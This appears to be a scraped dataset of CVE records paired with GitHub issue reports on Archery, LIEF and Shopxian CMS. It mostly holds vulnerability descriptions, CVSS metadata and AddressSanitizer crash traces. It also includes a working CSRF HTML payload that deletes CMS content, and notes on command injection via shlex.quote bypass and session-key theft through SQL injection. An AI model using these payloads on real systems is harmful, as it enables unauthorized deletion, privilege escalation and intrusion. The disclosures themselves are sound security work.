https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/binglog2sql.py#L43
Plugin binlog2sql has problems in the filtering method of start_file, end_file, start_time, stop_time parameters, which leads to injection system command execution, resulting in remote command execution vulnerability.
https://github.com/hhyo/Archery/blob/v1.8.5/sql/archiver.py#L283
https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/pt_archiver.py#L41
Plugin archiver do not filter `where` parameter, which leads to the execution of injectable system commands, resulting in a remote command execution vulnerability. Users in the DBA role can create malicious workflow and execute the workflow.
### 预期外的结果
Improper use of shlex.quote can cause quote bypassing with one more quote, and cause remote command execution.
### 日志文本
_No response_
### 版本
v1.8.5
### 部署方式
Docker
### 是否还有其他可以辅助定位问题的信息?比如数据库版本等
_No response_ | Multiple Remote Code Executioin | https://api.github.com/repos/hhyo/Archery/issues/1842/comments | 0 | 2022-09-19T02:30:23Z | 2022-09-19T13:45:32Z | https://github.com/hhyo/Archery/issues/1842 | 1,377,303,744 | 1,842 | 4,130 |
CVE-2022-38538 | 2022-09-13T15:15:09.023 | Archery v1.7.0 to v1.8.5 was discovered to contain a SQL injection vulnerability via the checksum parameter in the report module. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L145"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/issues/1841"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L145"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hhyo/Archery/issues/1841"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:archerydms:archery:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF3B860B-7F06-4778-9FCD-7A153778CE30",
"versionEndExcluding": "1.9.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/hhyo/Archery/issues/1841 | [
"Third Party Advisory"
] | github.com | [
"hhyo",
"Archery"
] | ### 重现步骤
https://github.com/hhyo/Archery/blob/v1.8.5/sql/slowlog.py#L167
The checksum parameter of the report interface is not escaped, and it is pass into the SQL statement for execution, results in SQL injection. Any logged-in user can execute SQL injection and steal other user's django session_key from database and can get DBA role permission.
https://github.com/hhyo/Archery/blob/v1.8.5/sql/db_diagnostic.py#L57
The parameter ThreadIDs of the create_kill_session interface is not converted to int type, resulting in SQL injection. Users in the DBA role can bypass query restrictions.
https://github.com/hhyo/Archery/blob/v1.8.5/sql/db_diagnostic.py#L88
The parameter ThreadIDs of the kill_session interface is not converted to int type, resulting in SQL injection, and because the result of the first SQL output is used as SQL statement, it will run again in the MySQL instance , results in Second Order SQL injection, can execution of arbitrary SQL statements, and users in the DBA role can bypass the SQL review process to execute arbitrary SQL statements.
### 预期外的结果
SQL injection without priveleges and SQL injection modify any data bypass the SQL review restrict. Any login user can combine these vulns to execute arbitrary SQL statements without restriction or logging.
### 日志文本
_No response_
### 版本
v1.8.5
### 部署方式
Docker
### 是否还有其他可以辅助定位问题的信息?比如数据库版本等
_No response_ | Multiple SQL injection | https://api.github.com/repos/hhyo/Archery/issues/1841/comments | 1 | 2022-09-19T02:27:58Z | 2022-09-19T13:47:02Z | https://github.com/hhyo/Archery/issues/1841 | 1,377,302,318 | 1,841 | 4,131 |
CVE-2022-38306 | 2022-09-13T21:15:09.427 | LIEF commit 5d1d643 was discovered to contain a heap-buffer overflow in the component /core/CorePrPsInfo.tcc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/763"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/763"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2B9842CE-CF1E-43E6-B3DF-9701F5DFE1DF",
"versionEndExcluding": "0.12.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/lief-project/LIEF/issues/763 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"lief-project",
"LIEF"
] | ###### version
```
latest master [5d1d643](https://github.com/lief-project/LIEF/commit/5d1d643a0c46437b57d35654690e03d26d189070)
```
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64)
###### Build step
```
cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
```
###### Run
```
./build/examples/c/elf_reader poc
```
[poc.zip](https://github.com/lief-project/LIEF/files/9288601/poc.zip)
###### AddressSanitizer output
```
Can't access the content of section #0
Can't access the content of section #1
Can't access the content of section #2
=================================================================
==2292604==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d000000268 at pc 0x7f5b35470a7d bp 0x7ffe10d8f4c0 sp 0x7ffe10d8ec68
READ of size 109 at 0x60d000000268 thread T0
#0 0x7f5b35470a7c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354
#1 0x55a087822aa7 in std::char_traits<char>::length(char const*) /usr/include/c++/9/bits/char_traits.h:342
#2 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::assign(char const*) /usr/include/c++/9/bits/basic_string.h:1443
#3 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(char const*) /usr/include/c++/9/bits/basic_string.h:709
#4 0x55a087822aa7 in void LIEF::ELF::CorePrPsInfo::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.tcc:41
#5 0x55a087822aa7 in LIEF::ELF::CorePrPsInfo::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:156
#6 0x55a0878260de in LIEF::ELF::CorePrPsInfo::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:44
#7 0x55a0877383f3 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:150
#8 0x55a08773bbe0 in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92
#9 0x55a08767077d in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857
#10 0x55a08767077d in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568
#11 0x55a0876ec34e in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296
#12 0x55a08767371e in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323
#13 0x55a087674f03 in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342
#14 0x55a087383c06 in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67
#15 0x55a087342c96 in main /home/wcc/LIEF/examples/c/elf_reader.c:16
#16 0x7f5b34eef0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#17 0x55a08738373d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x31c73d)
0x60d000000268 is located 0 bytes to the right of 136-byte region [0x60d0000001e0,0x60d000000268)
allocated by thread T0 here:
#0 0x7f5b35518587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
#1 0x55a08773b79b in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114
#2 0x55a08773b79b in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/9/bits/alloc_traits.h:443
#3 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/9/bits/stl_vector.h:343
#4 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/9/bits/stl_vector.h:358
#5 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/9/bits/stl_vector.h:302
#6 0x55a08773b79b in std::vector<unsigned char, std::allocator<unsigned char> >::vector(std::vector<unsigned char, std::allocator<unsigned char> > const&) /usr/include/c++/9/bits/stl_vector.h:552
#7 0x55a08773b79b in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:89
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 in __interceptor_strlen
Shadow bytes around the buggy address:
0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1a7fff8010: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
0x0c1a7fff8020: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a7fff8030: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c1a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa
0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2292604==ABORTING
``` | heap-buffer-overflow in elf_reader | https://api.github.com/repos/lief-project/LIEF/issues/763/comments | 1 | 2022-08-09T08:23:03Z | 2022-08-10T06:05:42Z | https://github.com/lief-project/LIEF/issues/763 | 1,332,896,530 | 763 | 4,132 |
CVE-2022-38307 | 2022-09-13T21:15:09.480 | LIEF commit 5d1d643 was discovered to contain a segmentation violation via the function LIEF::MachO::SegmentCommand::file_offset() at /MachO/SegmentCommand.cpp. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/764"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/764"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2B9842CE-CF1E-43E6-B3DF-9701F5DFE1DF",
"versionEndExcluding": "0.12.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/lief-project/LIEF/issues/764 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"lief-project",
"LIEF"
] | ###### version
```
latest master 5d1d643
```
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64)
###### Build step
```
cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
```
###### Run
```
./build/examples/c/macho_reader poc
```
[poc.zip](https://github.com/lief-project/LIEF/files/9289369/poc.zip)
###### AddressSanitizer output
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2360258==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000068 (pc 0x557d2bd89c98 bp 0x0ffffe483d3e sp 0x7ffff241e9b8 T0)
==2360258==The signal is caused by a READ memory access.
==2360258==Hint: address points to the zero page.
#0 0x557d2bd89c97 in LIEF::MachO::SegmentCommand::file_offset() const /home/wcc/LIEF/src/MachO/SegmentCommand.cpp:149
#1 0x557d2bac147d in LIEF::MachO::Binary::segment_from_offset(unsigned long) const /home/wcc/LIEF/src/MachO/Binary.cpp:541
#2 0x557d2bbd3252 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:1382
#3 0x557d2bc40fc8 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_binds<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:1356
#4 0x557d2bc40fc8 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:113
#5 0x557d2bb3ff6e in LIEF::MachO::BinaryParser::init_and_parse() /home/wcc/LIEF/src/MachO/BinaryParser.cpp:145
#6 0x557d2bb42ff9 in LIEF::MachO::BinaryParser::parse(std::unique_ptr<LIEF::BinaryStream, std::default_delete<LIEF::BinaryStream> >, unsigned long, LIEF::MachO::ParserConfig const&) /home/wcc/LIEF/src/MachO/BinaryParser.cpp:125
#7 0x557d2b665077 in LIEF::MachO::Parser::build() /home/wcc/LIEF/src/MachO/Parser.cpp:174
#8 0x557d2b667ce0 in LIEF::MachO::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::MachO::ParserConfig const&) /home/wcc/LIEF/src/MachO/Parser.cpp:64
#9 0x557d2b590706 in macho_parse /home/wcc/LIEF/api/c/MachO/Parser.cpp:27
#10 0x557d2b555885 in main /home/wcc/LIEF/examples/c/macho_reader.c:148
#11 0x7f9573af60b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#12 0x557d2b58f13d in _start (/home/wcc/LIEF/build/examples/c/macho_reader+0x31313d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/wcc/LIEF/src/MachO/SegmentCommand.cpp:149 in LIEF::MachO::SegmentCommand::file_offset() const
==2360258==ABORTING
``` | SEGV in SegmentCommand.cpp:149 | https://api.github.com/repos/lief-project/LIEF/issues/764/comments | 0 | 2022-08-09T09:54:15Z | 2022-08-10T05:27:03Z | https://github.com/lief-project/LIEF/issues/764 | 1,333,006,398 | 764 | 4,133 |
CVE-2022-38329 | 2022-09-13T21:15:09.537 | An issue was discovered in Shopxian CMS 3.0.0. There is a CSRF vulnerability that can delete the specified column via index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://albert5888.github.io/posts/CVE-2022-38329/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zhangqiquan/shopxian_cms/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://albert5888.github.io/posts/CVE-2022-38329/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zhangqiquan/shopxian_cms/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:shopxian:shopxian_cms:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C3E351B5-8095-4F9D-B555-EBD4349D1985",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/zhangqiquan/shopxian_cms/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zhangqiquan",
"shopxian_cms"
] | Vulnerability details:
When the administrator logs in, click the button will delete the specified column.
Vulnerability POC:
```<input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>```
CSRF HTML:

and click the button

Successfully deleted
 | CSRF vulnerable | https://api.github.com/repos/zhangqiquan/shopxian_cms/issues/4/comments | 0 | 2022-08-11T18:49:55Z | 2022-08-11T18:49:55Z | https://github.com/zhangqiquan/shopxian_cms/issues/4 | 1,336,357,318 | 4 | 4,134 |
CVE-2022-38495 | 2022-09-13T21:15:09.590 | LIEF commit 365a16a was discovered to contain a heap-buffer overflow via the function print_binary at /c/macho_reader.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/767"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/767"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4",
"versionEndExcluding": null,
"versionEndIncluding": "0.12.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/lief-project/LIEF/issues/767 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"lief-project",
"LIEF"
] | ###### Version
```
latest master 365a16a
```
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64)
###### Build step
```
cmake -DLIEF_ASAN=ON ../
```
###### Run
```
./build/examples/c/macho_reader poc
```
[poc.zip](https://github.com/lief-project/LIEF/files/9299163/poc.zip)
###### Output
```
Can't read the state data
Can't read the raw data of the load command
Binary Name: poc
Header
========
Magic: 0xcefaedfe
CPU Type: ARM64
CPU SubType: 0x0
File type: OBJECT
Number of commands: 0x13a
Commands size: 0x0
flags: 0x0
reserved: 0x0
Commands
========
THREAD 0x4040000f 0x00001c
=================================================================
==3241437==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000152 at pc 0x555c3f7df416 bp 0x7ffc25ef7040 sp 0x7ffc25ef7030
READ of size 1 at 0x602000000152 thread T0
#0 0x555c3f7df415 in print_binary /home/wcc/LIEF/examples/c/macho_reader.c:39
#1 0x555c3f7dff11 in main /home/wcc/LIEF/examples/c/macho_reader.c:150
#2 0x7fe3286cb0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#3 0x555c3f7debfd in _start (/home/wcc/LIEF/build/examples/c/macho_reader+0x280bfd)
0x602000000152 is located 1 bytes to the right of 1-byte region [0x602000000150,0x602000000151)
allocated by thread T0 here:
#0 0x7fe328cf2808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x555c3f8e3d36 in LIEF::MachO::init_c_commands(Macho_Binary_t*, LIEF::MachO::Binary*) /home/wcc/LIEF/api/c/MachO/LoadCommand.cpp:31
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wcc/LIEF/examples/c/macho_reader.c:39 in print_binary
Shadow bytes around the buggy address:
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff8000: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 fa
0x0c047fff8010: fa fa fd fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
=>0x0c047fff8020: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa 00 fa
0x0c047fff8030: fa fa 00 fa fa fa 00 fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3241437==ABORTING
``` | heap-buffer-overflow in macho_reader.c | https://api.github.com/repos/lief-project/LIEF/issues/767/comments | 1 | 2022-08-10T10:26:03Z | 2022-08-13T05:01:09Z | https://github.com/lief-project/LIEF/issues/767 | 1,334,409,301 | 767 | 4,135 |
CVE-2022-38496 | 2022-09-13T21:15:09.647 | LIEF commit 365a16a was discovered to contain a reachable assertion abort via the component BinaryStream.hpp. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/765"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/lief-project/LIEF/issues/765"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4",
"versionEndExcluding": null,
"versionEndIncluding": "0.12.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/lief-project/LIEF/issues/765 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"lief-project",
"LIEF"
] | ###### version
```
latest master 365a16a
```
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64)
###### Build step
```
cmake -DLIEF_ASAN=ON ../
```
###### Run
```
./build/examples/c/macho_reader poc
```
[poc.zip](https://github.com/lief-project/LIEF/files/9299006/poc.zip)
###### Output
```
Segment : content corrupted!
Can't parse section in #0
terminate called after throwing an instance of 'std::length_error'
what(): vector::_M_default_append
[1] 3227500 abort ./build/examples/c/macho_reader poc
``` | Abort in BinaryStream.hpp | https://api.github.com/repos/lief-project/LIEF/issues/765/comments | 0 | 2022-08-10T10:05:20Z | 2022-08-13T05:00:36Z | https://github.com/lief-project/LIEF/issues/765 | 1,334,384,359 | 765 | 4,136 |
CVE-2022-38497 | 2022-09-13T21:15:09.703 | LIEF commit 365a16a was discovered to contain a segmentation violation via the component CoreFile.tcc:69. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
